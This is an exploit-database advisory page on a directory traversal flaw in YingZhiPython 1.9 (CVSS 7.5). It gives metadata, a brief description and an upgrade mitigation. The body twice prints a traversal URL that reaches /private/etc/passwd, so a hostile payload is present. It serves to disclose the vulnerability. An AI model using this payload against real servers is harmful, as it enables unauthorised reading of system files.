header-logo
Suggest Exploit
vendor:
YingZhiPython
by:
SecurityFocus
7,5
CVSS
HIGH
Information Disclosure
22
CWE
Product Name: YingZhiPython
Affected Version From: 1.9
Affected Version To: 1.9
Patch Exists: Yes
Related CWE: N/A
CPE: a:yingzhi:yingzhipython:1.9
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2012

YingZhiPython 1.9 Information Disclosure Vulnerability

YingZhiPython 1.9 is vulnerable to an information disclosure vulnerability, which allows an attacker to obtain sensitive information by exploiting a directory traversal vulnerability. This can be done by sending a specially crafted HTTP request containing '../' sequences to the vulnerable server. An example of such a request is ftp://www.example.com/../../../../../../../private/etc/passwd

Mitigation:

Upgrade to the latest version of YingZhiPython
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/55685/info

An attacker can exploit these issues to obtain sensitive information, to upload arbitrary code, and to run it in the context of the web server process.

YingZhiPython 1.9 is vulnerable; other versions may also be affected. 

ftp://www.example.com/../../../../../../../private/etc/passwd

Navigation

Suggest Exploit

Services By CQR